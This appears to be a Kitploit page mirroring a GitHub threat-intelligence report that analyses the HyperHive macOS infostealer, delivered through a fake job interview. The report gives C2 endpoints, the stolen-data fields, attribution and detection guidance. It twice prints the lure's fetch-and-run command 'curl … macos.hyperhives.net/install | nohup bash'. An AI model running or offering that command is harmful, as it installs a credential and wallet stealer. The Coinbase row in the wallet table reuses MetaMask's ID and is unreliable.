Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
hyperhives-macos-infostealer-analysis — 完整静态分析 HyperHive macOS Rust 信息窃取器 — 571 个解密配置值、C2 基础设施、DPRK/Contagious Interview 归因、YARA/Sigma 规则、STIX 2.1 包、ATT&CK Navigator 层 | Kitploit
工具/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
危害指标 (IOC) 管理OSINT (开源情报)逆向工程取证分析恶意软件分析威胁情报论文与研究学习与教育精选资源

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
darksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

完整静态分析 HyperHive macOS Rust 信息窃取器 — 571 个解密配置值、C2 基础设施、DPRK/Contagious Interview 归因、YARA/Sigma 规则、STIX 2.1 包、ATT&CK Navigator 层

查看仓库网站
31435个月前Kitploit 审核通过

HyperHives macOS信息窃取器 — 全面技术分析

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

威胁情报: 基于Rust的macOS通用二进制信息窃取器,通过Wellfound(原名AngelList)上的虚假面试流程投递。操作者身份为来自"HyperHive"的"Felix",诱骗目标从macos.hyperhives.net运行恶意安装程序。本仓库记录了完整的静态分析:571个加密配置值已恢复,包括C2 URL、Sentry DSN以及276个被针对的Chrome扩展ID。

样本 SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2 域名cloudproxy.link
交付域名macos.hyperhives.net
诱饵平台Wellfound(原名AngelList)
操作者身份"Felix" 来自 "HyperHive"
VirusTotal9 / 63 检测
分类公开披露 / IOC 包
最后更新2026年4月

目录

  • 威胁情报包
  • 仓库布局
  • 快速开始
  • TL;DR
  • 1 — 攻击起源
  • 2 — 二进制文件
  • 3 — 窃取内容
  • 4 — 解密后的 C2 基础设施
  • 5 — 归因分析
  • 6 — 密码分析
  • 7 — MITRE ATT&CK 映射
  • 8 — 钱包与扩展 ID 参考
  • 9 — 建议措施
  • 10 — 方法论
  • 附录 A — 全部 276 个 Chrome 扩展 ID
  • 范围与限制
  • 发布历史
  • 贡献指南
  • 许可证

威胁情报包


仓库布局```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

root@kitploit:~
---

## 快速开始

将样本放在 `sample/installer_binary` 目录下(哈希验证请参见 [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)),然后:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

The compose file enforces network_mode: none, read_only: true,并丢弃所有 Linux 功能。完整处理指南请参见 SECURITY.md。


TL;DR

在 Wellfound(原 AngelList)上的一则招聘信息引发了一个多邮件的社会工程链,来自操作者角色 "Felix" 和 "HyperHive"。在夸奖目标的技术背景并安排了一场虚假面试后,攻击者指示受害者“审查产品”于 hyperhives.net,并特别检查 Settings → Diagnostics → Log —— 这一借口旨在触发执行:``` curl -s https://macos.hyperhives.net/install | nohup bash &

root@kitploit:~
该有效负载是一个**8.5 MB 的 Mach-O 通用二进制文件**(x86_64 + arm64),使用 Rust 编译。通过隔离的 Docker 实验室和 CPU 仿真对 **570 个独特的 x86_64 辅助例程**进行静态分析,恢复了**所有 571 个加密配置值**,揭示了:

- **C2:** `cloudproxy.link` — 四个 HTTPS 端点
- **Sentry(归属分析枢纽):** 完整的 DSN,包含 `ingest.de.sentry.io` 上的组织/项目 ID
- **构建身份:** Cargo 用户 `rootr`,代号 `force`,版本 `9.12.1`
- **目标:** 276 个 Chrome 扩展 ID(加密货币钱包、密码管理器、企业凭证)

这些策略与**朝鲜关联的 Contagious Interview** 活动一致——在合法平台上的虚假招聘、多步骤信任构建、`curl | bash` 交付、Rust macOS 窃取器以及针对加密货币的窃取。

---

## 1 — 攻击的起点

### 诱饵:Wellfound 上的虚假求职面试

攻击始于在 **Wellfound**(原 AngelList)上发布的一个**看似合法的职位信息**。目标申请后,以下邮件链从一位化名 **"Felix"**、公司名为 **"HyperHive"** 的操作者发出:

**邮件 1**(2026 年 4 月 4 日)—— 初次接触。"Felix" 确认了目标的简历和 LinkedIn,声称他们的"技术主管"批准了下一步,并特别提到了目标真实的技术经验。邮件称 HyperHive 正在"构建跨不同操作系统的 Hyperhives 桌面版本",并邀请目标在 UTC+0 时区安排面试。

**邮件 2**(2026 年 4 月 5 日)—— 后续安排。提议了具体的面试时间(2026 年 4 月 8 日 15:00 UTC),并包含了关键的有效负载交付指令:

> *"如果您可以的话,请也快速查看一下 **设置 → 诊断 → 日志** 下的产品日志。我们可能会要求您对日志以及您注意到的其他产品观察结果做一些简要评论,因为这通常是工程经验和关注细节的良好信号。"*

这将目标引导至 `https://hyperhives.net`,导航到诊断部分后触发了:```
curl -s https://macos.hyperhives.net/install | nohup bash &

接下来发生了什么

该命令下载并执行了一个8.5 MB的 Mach-O 通用二进制文件。通过 AppleScript 弹出了一个虚假的 macOS 密码对话框。**密码未被输入。**进程立即终止,样本被保留供分析。

社会工程学伎俩总结


2 — 二进制文件

该样本展现出生产级工程水准:语义化版本管理、Sentry 集成以保障运行可靠性,以及一个包含570个独特辅助函数加密的大型嵌入式配置。

VirusTotal 检测覆盖

完整报告 — 截至首次提交(2026年4月),63个引擎中有9个检测到。超过85%的引擎未能标记该样本。

用于交叉引用的知名厂商家族名称:HashBreaker (Kaspersky)、JobStealer (DrWeb)、PSW.Agent.BX (ESET)、Stealer-BU (Avast/AVG)。

未被检测到的厂商包括: BitDefender、CrowdStrike Falcon、Sophos、Symantec、McAfee、Malwarebytes、TrendMicro、Fortinet、ClamAV、Panda 及其他44个引擎。这种低检测率凸显了该活动所使用的 Rust 结合自定义混淆方法的操作有效性。

检测比率会随厂商更新签名而变化。请查看 VirusTotal 报告 获取最新结果。


3 — 窃取内容

浏览器数据(Chromium 内核)

窃取的数据类型: 密码、信用卡信息、Cookie、会话令牌、自动填充数据、浏览历史。

macOS 系统数据

  • 登录钥匙串 (login.keychain-db) — 需要通过虚假对话框窃取的用户密码
  • Apple Notes — 通过 AppleScript/osascript 窃取
  • 硬件标识符 — IOPlatformExpertDevice / IOPlatformUUID,作为 hardwares 上报至 C2

即时通讯

  • Telegram Desktop — tdata 会话资料,用于完全接管账户

加密货币钱包(188个逻辑目标,276个扩展ID)

全面针对浏览器扩展钱包,包括 MetaMask、Phantom、Trust Wallet、Ronin、Exodus、OKX、Bybit、Bitget、SubWallet、Ledger Live 和 Trezor Suite。完整映射参见第8节及 output/full_decrypted_config.json。

密码管理器

规避与操作控制

功能详情
VM 检测C2 JSON 中的 is_vm 标志
强制模式force_mode 远程覆盖标志

数据外泄

数据暂存于 ~/Documents/temp_data/Application/ 目录,压缩为 ZIP,通过 HTTPS 的 multipart/form-data 上传。受害者 IP 和地理位置通过 https://freeipapi.com/api/json 解析。


4 — 解密后的 C2 基础设施

命令与控制

端点角色
https://cloudproxy.link/m/opened信标 / 激活
https://cloudproxy.link/m/metrics遥测

Sentry DSN(操作者指纹)```

https://526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008

root@kitploit:~
| 组件 | 值 |
|-----------|-------|
| **公钥** | `526eff9f8bb7aafd7117ca5e33a6a183` |
| **组织 ID** | `4509139651198976` |
| **项目 ID** | `4509422649213008` |
| **区域** | EU — `ingest.de.sentry.io` |

通过 Sentry 的合法流程可能获取到与此组织/项目关联的账户注册信息、账单记录及访问元数据。

### 地理位置 API

`https://freeipapi.com/api/json` — 受害者 IP / 国家,用于 C2 JSON(`ipAddress`、`countryCode`)。

### C2 外泄协议

| 字段 | 作用 |
|-------|------|
| `buildName` / `buildVersion` | `force` / `9.12.1` |
| `uid`、`log_id` | 受害者/会话标识 |
| `ip`、`geo` | 来自地理位置 API |
| `pers_password` | 假对话框密码 |
| `passwords`、`wallets`、`credits`、`autofills` | 窃取的材料 |
| `is_vm`、`hardwares`、`force_mode` | 环境/控制标志 |

上传方式:`multipart/form-data`、`application/zip`,连接字符串 `UPLD connect`。

---

## 5 — 关联归因

### 入侵指标

| 指标 | 值 | 来源 |
|-----------|-------|--------|
| 诱饵平台 | Wellfound (AngelList) | 受害者报告 |
| 操作者身份 | "Felix" at "HyperHive" | 诱饵邮件 |
| 诱饵网站 | `hyperhives.net` | 诱饵邮件 |
| 发件人邮箱 | `[email protected]` | 诱饵邮件 |
| 投递域名 | `macos.hyperhives.net` | 载荷下载 |
| 投递 IP | `81.28.12.12` (Gcore CDN) | DNS 解析 |
| 注册商/邮箱 | Tucows; Spacemail | WHOIS / MX |
| **C2 域名** | **`cloudproxy.link`** | **从样本解密** |
| **Sentry DSN** | 见 [第 4 节](#sentry-dsn-operator-fingerprint) | **从样本解密** |
| 构建用户 | `rootr` | 嵌入的 Cargo 路径 |
| 样本 SHA-256 | `5c7385c3...bf8dd3` | 文件哈希 |

### 开发者代号:`rootr`

嵌入路径 `/Users/rootr/.cargo/registry/`。对该代号的开源情报调查([github.com/rootr](https://github.com/rootr) 截至分析日期):所属公司 "RootR",位置日内瓦,账户创建于 **2024-06-27**,零个公开仓库。与一次性或操作型配置文件一致。

### 朝鲜/传染性面试(分析评估)

| TTP | 此样本 | 已报告的朝鲜相关模式 |
|-----|-------------|--------------------------------|
| **在合法平台发起虚假招聘** | Wellfound (AngelList) 发帖 → 与 "Felix" 的邮件往来 | 传染性面试:LinkedIn、Indeed、Wellfound 上的虚假招聘者联系 |
| **多步骤社会工程** | 2 封以上邮件提及真实简历、安排虚假面试 | 建立信任后再投递载荷;多个朝鲜行动中均有记录 |
| **产品评测/代码测试借口** | "检查设置 → 诊断 → 日志" | "审查我们的项目"/"运行这个代码测试"等借口 |
| `curl \| bash` 投递 | 从 `macos.hyperhives.net` 安装单行命令 | 常见的 macOS 社会工程向量 |
| Rust Mach-O 通用二进制 | rustc 1.87.0, x86_64 + arm64 | RustDoor / RustBucket 等相似家族 |
| 假密码对话框 | AppleScript `osascript` | 相关 macOS 行动中已有记录 |
| 大量加密货币钱包目标集 | 276 个扩展 ID,188 个钱包名称 | 财务动机与朝鲜创收一致 |

**置信度:** **高**,基于主题和 TTP 的对齐。Wellfound 虚假招聘管道、多邮件信任链、产品评测借口、Rust macOS 窃密器以及加密货币钱包焦点与传染性面试战术手册高度吻合。此为分析评估,并非政府或执法机构的归因声明。

---

## 6 — 密码分析

配置字符串受 **自定义 XOR 加密** 保护:570 个小型的 x86_64 辅助函数(代码范围 `0x10000`–`0x15000`)各自根据 `(data_ptr, seed)` 计算一个唯一的 16 位偏移量。该偏移量指向二进制文件中的某个位置,从而产生一个 32 字节的 XOR 密钥,用于解密对应的密文块。

### 失败的方法

| 方法 | 结果 |
|--------|---------|
| 朴素的 XOR 扫描 | 未发现连贯明文 |
| AES / PBKDF2 密钥猜测 | 未找到密钥调度 |
| 完整二进制的 Unicorn 模拟 Rust 运行时 | 控制流复杂性导致发散 |

### 成功的方法

1. **扫描** 针对配置区域 (`0x2b8000`–`0x2bc000`) 的 RIP 相对 `LEA` 指令。
2. **解析** 前面的代码以提取 `(helper_function_address, data_pointer, seed)`。
3. **模拟** 使用 [Unicorn Engine](https://www.unicorn-engine.org/) 隔离执行每个辅助函数(最多 200 条指令)。
4. **XOR 解密** 利用计算得出的偏移量处的密钥,解密目标地址上的 32 字节块。
5. **扩展** 用于多块字符串(URL、DSN)和 OR+XOR 元数据条目。

**覆盖率:** 381 个 XOR 块 + 190 个 OR+XOR 元数据条目 = 1.1 秒内恢复 **571 个配置值**。零个未能恢复的加密条目。

**实现:** [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)

---

## 7 — MITRE ATT&CK 映射

> 将 [`attack-navigator-layer.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/attack-navigator-layer.json) 导入 [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) 以获得交互式视图。

| 技术 | ID | 本样本中的使用 |
|-----------|----|--------------------|
| 钓鱼攻击 | T1566 | 来自 `[email protected]` 的社会工程邮件 |
| 用户执行:恶意文件 | T1204.002 | 从诱饵 `curl \| bash` |
| 命令和脚本解释器:AppleScript | T1059.002 | 假密码对话框、Apple Notes 外泄 |
| 命令和脚本解释器:Unix Shell | T1059.004 | 通过管道 bash 初始执行 |
| 从密码库获取凭据:钥匙串 | T1555.001 | 登录钥匙串提取 |
| 从密码库获取凭据:从 Web 浏览器获取凭据 | T1555.003 | Chromium Login Data 解密 |
| 窃取 Web 会话 Cookie | T1539 | 浏览器 cookie 和令牌窃取 |
| 从本地系统获取数据 | T1005 | 钱包、Telegram、Notes、自动填充 |
| 收集的数据归档 | T1560 | 在 `~/Documents/temp_data/` 下打包 ZIP |
| 通过 C2 通道外泄 | T1041 | HTTPS POST 到 `cloudproxy.link` |
| 应用层协议:Web 协议 | T1071.001 | 具有四个端点的 HTTPS C2 |
| 虚拟化/沙箱规避 | T1497 | `is_vm` 标志 |
| 混淆文件或信息 | T1027 | 570 个 XOR 辅助函数 |
| 输入捕获 | T1056 | 假密码对话框 |
| 系统信息发现 | T1082 | 硬件 ID 和操作系统版本收集 |
| 系统网络配置发现 | T1016 | `freeipapi.com` 地理位置 |
| 颠覆信任控制:Gatekeeper 绕过 | T1553.001 | 对下载的二进制文件执行 `xattr -c` |

---

## 8 — 钱包和扩展 ID 参考

已恢复 188 个钱包名称和 **276 个唯一** 32 字符 Chrome 扩展 ID。下表列出了高价值目标;完整列表见 [附录 A](#appendix-a--all-276-chrome-extension-ids) 和 `output/full_decrypted_config.json`。

| 钱包 | 扩展 ID |
|--------|--------------|
| MetaMask | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
| Phantom | `bfnaelmomeimhlpmgjnjophhpkkoljpa` |
| Trust Wallet | `egjidjbpglichdcondbcbdnbeeppgdph` |
| Ronin | `fnjhmkhhmkbjkkabndcnnogagogbneec` |
| Exodus Web3 | `aholpfdialjgjfhomihkjbmgjidlcdno` |
| OKX | `mcohilncbfahbmgdjkbpemcciiolgcge` |
| Bybit | `pdliaogehgdbhbnmkklieghmmjkpigpa` |
| Bitget | `jiidiaalihmmhddjgbnbgdfflelocpak` |
| SubWallet | `onhogfjeacnfoofkfgppdlbmlmnplgbn` |
| Coinbase Wallet | `hnfanknocfeofbddgcijnmhnfnkdnaad` |

**桌面钱包:** Ledger Live 和 Trezor Suite 数据目录同样被列为目标。

**重要提示:** 这些扩展 ID 标识的是**合法的浏览器扩展**,恶意软件旨在窃取其本地数据。它们**并非**恶意扩展。

---

## 9 — 建议措施

### 对潜在受害者

- **不要**运行未知的 `curl | bash` 一行命令
- 如果已暴露,轮换所有浏览器中存储的凭据、加密货币钱包密钥和密码管理器主密码
- 检查磁盘上是否存在 `~/Documents/temp_data/`
- 向当地执法部门和相关国家 CERT(如 IC3、NCSC)报告

### 对防御者

- **屏蔽** `macos.hyperhives.net`、`cloudproxy.link` 和 `81.28.12.12`(屏蔽 IP 前请确认共享主机影响)
- **搜索** 发往 `cloudproxy.link` 的 HTTPS 流量以及针对这两个域名的 DNS 查询
- **部署** 本仓库中的 YARA 和 Sigma 规则(根据你的环境调优)
- **比对** 已安装的 Chrome 扩展与 276 个 ID 列表(这些扩展是合法的——恶意软件读取它们的本地数据)
- **导入** 将 `stix/bundle.json` 导入你的 CTI 平台(MISP、OpenCTI、ThreatConnect 等)

### 对合法调查

| 目标 | 请求内容 |
|--------|-----------------|
| Sentry | 组织 `4509139651198976` 的账户和账单记录 |
| 域名注册商 | `cloudproxy.link` 和 `hyperhives.net` 的 WHOIS 记录 |
| Gcore CDN | `81.28.12.12` 的访问日志 |
| 邮箱提供商 | `[email protected]` 的账户记录 |
| GitHub | `rootr` 的账户元数据 |

---

## 10 — 方法论

分析在 **Docker 容器** 中进行,配置包括:
- `network_mode: none`(无出站连接)
- `read_only: true`(不可变根文件系统)
- 删除所有 Linux 能力(`cap_drop: ALL`)
- `no-new-privileges` 安全选项

工具:Python(LIEF、Unicorn Engine、Capstone、r2pipe)、Radare2 以及自定义脚本。未对恶意软件进行动态执行——所有发现均源于静态分析和单个辅助函数的隔离 CPU 模拟。

已验证的产物: [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)、[`output/full_decrypted_config.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/output/full_decrypted_config.json)。

---

## 附录 A — 所有 276 个 Chrome 扩展 ID

恶意软件配置中引用了这些扩展 ID(用户配置文件下的 local-storage / LevelDB 路径)。**这些 ID 标识的是被恶意软件作为数据窃取目标的合法扩展,并非恶意扩展。**```
abkahkcbhngaebpcgfmhkoioedceoigp  abogmiocnneedmmepnohnhlijcjpcifd
acmacodkjbdgmoleebolmdjonilkdbch  aeachknmefphepccionboohckonoeemg
aeblfdkhhhdcdjpifhhbdiojplfjncoa  afbcbjpbpfadlkmhmclhkeeodmamcflc
afccgfbnbpgfdokbllhiccepgggofoco  aflkmfhebedbjioipglgcbcmnbpgliof
agoakfejjabomempkjlepdflaleeobhb  ahkpfejaeoepmfopmbhjgjekibmfcfgo
aholpfdialjgjfhomihkjbmgjidlcdno  aiifbnbfobpmeekipheeijimdpnlpgpp
aijcbedoijmgnlmjeegjaglmepbmpkpi  ajofhbfomojicfifgoeeimefklkfdkfn
ajopcimklncnhjednieoejhkffdolemp  akckefnapafjbpphkefbpkpcamkoaoai
akkmagafhjjjjclaejjomkeccmjhdkpa  algblmhagnobbnmakepomicmfljlbehg
amdcajcnofodjpgbbdnnjkffamfnidae  amkmjjmmflddogmhpjloimipbofnfjih
ammjlinfekkoockogfhdkgcohjlbhmff  anokgmphncpekkhclmingpimjmcooifb
aodkkagnadcbobfpggfnjeongemjbjca  aoedbjimepepemdafoodplnknfkmbnle
apgjfbcibghlclbdiipmojppngeilcol  bbjmepflljbbfaehppakknfgdnojoled
bccippoanbhflmokhkbkepmhmndijenh  bcpialkijhffpgnmgjhjmdeabdbbfmbo
bdgmdoedahdcjmpmifafdhnffjinddgc  bfeplaecgkoeckiidkgkmlllfbaeplgm
bflldjbbpcjgooclhpmhdhioebmnnkcm  bfnaelmomeimhlpmgjnjophhpkkoljpa
bgjogpoidejdemgoochpnkmdjpocgkha  bhhhlbepdkbapadjdnnojkbgioiodbic
bhmbcdekobebkhmloafbjfdcphbmpcnm  bidcmgjdfgkagkleecdockomdjlgglbg
bifidjkcdpgfnlbcjpdkdcnbiooooblg  blnieiiffboillknjnepogjhkgnoapac
bmkakpenjmcpfhhjadflneinmhboecjf  bmmhjnaohafphhlecmkkiaaglcebcapn
bodadjcgfgigmmnambomndppidgdjlni  bplepbelihejfpcjoeialhjpamgpnfln
caalbmclnkldkcgcdkfiapoopikbofnl  cgeeodpfagjceefieflmdfphplkenlfk
cihmoadaighcejopammfbmddcmdekcje  ciojocpkclfflombbcfigcijjcbkmhaf
cjelfplplebdjjenllpjcblmjkfcffne  ckklhkaabbmdjkahiaaplikpdddkenic
cmbagcoinhmacpcgmbiniijboejgiahi  cmoakldedjfnjofgbbfenefcagmedlga
cnmbailpgmdagpofalkeoeooefdkjfdl  cnncmdhjacpkmjmkcafchppbnpnhdmon
cnoepnljjcacmnjnopbhjelpmfokpijm  codfcglpplgmmlokgilfkpcjnmkbfiel
cpmkedoipcpimgecpmgpldfpohjplkpp  dbgnhckhnppddckangcjbkjnlddbjkna
dcbjpgbkjoomeenajdabiicabjljlnfp  dfbacijefbcabjnngipfnbhcpoldlkcg
dkdedlpgdmmkkfjabffeganieamfklkm  dlcobpjiigpikoobohmabehhmhfoodbb
dldjpboieedgcmpkchcjcbijingjcgok  dmjmllblpcbmniokccdoaiahcdajdjof
dngmlblcodfobpdpecaadgfbcggfjfnm  dpcklmdombjcplafheapiblogdlgjjlb
dpdmipjakdiapplcecdmgckknipnfjph  dpealdfjgahljjdekeiadjnfgpijffhg
dpmfhilhjlhhakpbieclcghochdofeao  eaeecbmeajhliilmacefcgjnnijkkfki
ebaeifdbcjklcmoigppnpkcghndhpbbm  ebfidpplhabeedpnhjnobghokpiioolj
efbglgofoippbgcjepnhiblaibcnclgk  egjidjbpglichdcondbcbdnbeeppgdph
ehgjhhccekdedpbkifaojjaefeohnoea  ehjiblpccbknkgimiflboggcffmpphhp
ejbalbakoplchlghecdalmeeeajnimhm  ejbidfepgijlcgahbmbckmnaljagjoll
ejdmhlhkcfbkcoifejkcbonhodkgflgg  ejjladinnckdgjemekebdpeokbikhfci
elalghlhoepcjfaedkcmjolahamlnjcp  eljobehkpcnpekmbcjiidekjhkbcnpkf
ellkdbaphhldpeajbepobaecooaoafpg  emafjfadeeammocialbgjbaeldmpddne
emeeapjkbcbpbpgaagfchmcgglmebnen  emgcpdnckldpdhjgmkeeahfaokmhgpab
enabgbdfcbaehmbigakijjabdpdnimlg  epapihdplajcdnnkdeiahlgigofloibg
fajmdbbmcncahahilpfdiacamedmgdlk  fbplgegfggencanbeceipjpanlmgpkfi
fcckkdbjnoikooededlapcalpionmalo  fcfcfllfndlomdhbehjjcoimbgofdncg
fcjkomdnccnlklmhncgmaehaakjkddnk  fdchdcpieegfofnofhgdombfckhbcokj
fdcnegogpncmfejlfnffnofpngdiejii  fdjamakpfbbddfjaooikfcpapjohcfmg
fhbohimaelbohpjbbldcngcnapndodjp  fhilaheimglignddkjgofkcbgekhenbh
fhmmkjofdcpnoklcbcnbjjhigobceikb  fihkakfobkmkjojpchpfgcmhfjnmnfpi
fijngjgcjhjmmpcmkeiomlglpeiijkld  fjghjobbfggoacelnibacipoilennobn
fldfpgipfncgndfolcbkdeeknbbbnhcc  fmpbldieijjehhalgjblbpgjmijencll
fnabdmcgpkkjjegokfcnfbpneacddpfh  fnjhmkhhmkbjkkabndcnnogagogbneec
fnnegphlobjdpkhecapkijjdkgcjhkib  fopmedgnkfpebgllppeddmmochcookhc
fpibioaihcagphbidhodidjbnclocgll  fpkhgmpbidmiogeglndfbkegfdlnajnf
gbjepgaebckfidagpfeioimheabiohmg  gdokollfhmnbfckbobkdbakhilldkhcj
gejiddohjgogedgjnonbofjigllpkmbf  ghihpcdpbjaaomhlfnhdlocimojkinpm
ghlmndacnhlaekppcllcpcjjjomjkjpg  ghmbeldphafepmbegfdlkpapadhbakde
gjlmehlldlphhljhpnlddaodbjjcchai  gkeelndblnomfmjnophbhfhcjbcnemka
gkhnjcpkikkkfhhdhhphcbhmkikoicgn  gkpbmnplcjdnnmmiaaphofhdiicdhfah
glhefpglgefbmegkpjkdgoikologepdl  hbbgbephgojikajhfbomhlmmollphcad
hbdheoebpgogdkagfojahleegjfkhkpl  hbinmkhlebcnghpikoekkbeljbealbje
hbneiaclpaaglopiogfdhgccebncnjmc  hbnpcbochkgodkmmicbhfpmmkhbfbhim
hddkffjleepiafmkhcneldjipkfkkofk  hdokiejnpimakedhajhdlcegeplioahd
heefohaffomkkkphnlpohglngmbcclhi  hgbeiipamcgbdjhfflifkgehomnmglgk
hgnpaljkalilofmmbhgkkldbdbogddlo  hifafgmccdpekplomjjkcfgodnhcellj
hlbmghfhijdlnllnnnakmcagdfhhkfna  hmeobnfnfcmdkdcmlblgagmfpfboieaf
hnfanknocfeofbddgcijnmhnfnkdnaad  hnhobjmcibchnmglfbldbfabcgaknlkj
hpbgcgmiemanfelegbndmhieiigkackl  hpclkefagolihohboafpheddmmgdffjm
hpglfhgfnhbgpjdenjgmdgoeiappafln  hpjiiechbbhefmpggegmahejiiphbmij
ibjflpbmadchofnbpppegdbnifdgincp  ibljocddagjghmlpgihahamcghfggcjc
ibnejdfjmmkpcnlpebklmnkoeoihofec  icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
idnnbdplmphpflfnlkomgpfbpcgelopg  idpfplgehakelkdadhcacicjjbemjbke
ifckdpamphokdglkkdomedpdegcjhjdp  ifclboecfhkjbpmhgehodcjpciihhmif
ifgjklbmlnimhldbmddmkdhoahfocppf  ikcpjgihikfinlkobegiiogdigohmfam
ilhaljfiglknggcoegeknjghdgampffk  imlcamfeniaidioeflifonfjeeppblda
iokeahhehimjnekafflcihljlcjccdbe  jaooiolkmfcmloonphpiiogkfckgciom
jbdaocneiiinmjbjlgalhcelgbejmnid  jccapkebeeiajkkdemacblkjhhhboiek
jfdlamikmbghhapbgfoogdffldioobgl  jfflgdhkeohhkelibbefdcgjijppkdeb
jhjebgdkdemiibiibgickfkilfpbelaj  jhnilbocebbmeelaolalihfokjgdmogb
jicpmdkafljkkppgpellcjhfhdmjpogm  jiepnaheligkibgcjgjepjfppgbcghmp
jiidiaalihmmhddjgbnbgdfflelocpak  jjkhekbaikcnpnhflnnlnbonkkobkiim
jljjeghmeihjegifdhbghcoihdiegkkl  jmgipjhlmabpmcikcahmmgleghckefjg
jnggcdmajcokeakpdeagdhphmkioabem  jnldfbidonfeldmalbflbmlebbipcnle
jnlgamecbpmbajjfhmmmlhejkemejdma  jojhfeoedkpkglbfimdfabpdfjaoolaf
kdgponmicjmjiejhifbjgembdcaclcib  keenhcnmdmjjhincpilijphpiohdppno
kfdniefadaanbjodldohaedphafoffoh  kgdijkcfiglijhaglibaidbipiejjfdp
khgocmkkpikpnmmkgmdnfckapcdkgfaf  khpkpbbcccdmmclmpigdgddabeilkdpd
kilnpioakcdndlodeeceffgjdpojajlo  kjjebdkfeagdoogagbhepmbimaphnfln
kkpehldckknjffeakihjajcjccmcjflh  kkpllbgjhchghjapjbinnoddmciocphm
kkpllkodjeloidieedojogacfhpaihoh  klghhnkeealcohjjanjjdaeeggmfmlpl
kmphdnilpmdejikjdnlbcnmnabepfgkh  kncchdigobghenbbaddojjnnaogfppfj
kolfcecahpbgbilkdkalabnfjjklkkae  kpfopkelmapcoipemfendmdcghnegimn
kppfdiipphfccemcignhifpjkapfbihd  kppgpfphbmbcgeglphjnhnhibonmebkn
lccbohhgfkdikahanoclbdmaolidjdfl  ldcihfaojdpmhjkhioilfjjckehehddg
lfmmjkfllhmfmkcobchabopkcefjkoip  lgmpcpglpngdoalbgeoldeajfclnhafa
lkpmkhpnhknhmibgnmmhdhgdilepfghe  llakdhpogpnejheknjbhbadoaomejgbi
lmkncnlpeipongihbffpljgehamdebgi  lnnnmfcpbkafcpgdilckhmhbkkbpkmid
loinekcabhlmhjjbocijdoimmejangoa  lpfcbjknijpeeillifnkikgncikgfhdo
lpilbniiabackdjcionkobglmddfbcjo  magbanejlegnbcppjljfhnmfmghialkl
mapbhaebnddapnmifbbkgeedkeplgjmf  mcbigmjiafegjnnogedioegffbooigli
mcohilncbfahbmgdjkbpemcciiolgcge  mdjjoodeandllhefapdpnffjolechflh
mdjmfdffdcmnoblignmgpommbefadffd  mdnaglckomeedfbogeajfajofmfgpoae
mfgccjchihfkkindfppnaooecgfneiii  mfiealgchgibibbamfjebflnfjihfedk
mgbfflhghaohmaecmaggieniidindaoc  mgfbabcnedcejkfibpafadgkhmkifhbd
mgffkfbidihjpoaomajlbgchddlicgpn  mjgkpalnahacmhkikiommfiomhjipgjn
mkchoaaiifodcflmbaphdgeidocajadp  mkjjflkhdddfjhonakofipfojoepfndk
mkpegjkblkkefacfnmkajcjmabijhclg  mlbnicldlpdimbjdcncnklfempedeipj
mlhakagmgkmonhdonhkpjeebfphligng  mmmjbcfofconkannjonfmjjajpllddbg
mnfifefkajgofkcjkemidiaecocnkjeh  mnnkpffndmickbiakofclnpoiajlegmg
modjfdjcodmehnpccdjngmdfajggaoeh  nanjmdknhkinifnkgdcggcfnhdaammmj
nankopfjhdflikcokhgohiaoehnjfako  nbdhibgjnjpnkajaghbffjbkcgljfgdi
nbdpmlhambbdkhkmbfpljckjcmgibalo  nebnhfamliijlghikdgcigoebonmoibm
nfaepmamdapehcbedhejbjcpnlcldodi  nfinomegcaccbhchhgflladpfbajihdf
ngakogceekkandcbkniokoghdckjhhok  nglnaekfdaelelcaokeemlnopjhekdkj
nhlnehondigmgckngjomcpcefcdplmgc  nhnkbkgjikgcigadomkphalanndcapjk
niiaamnmgebpeejeemoifgdndgeaekhe  njoljnomkdoakfphjbapdopdcneceeaf
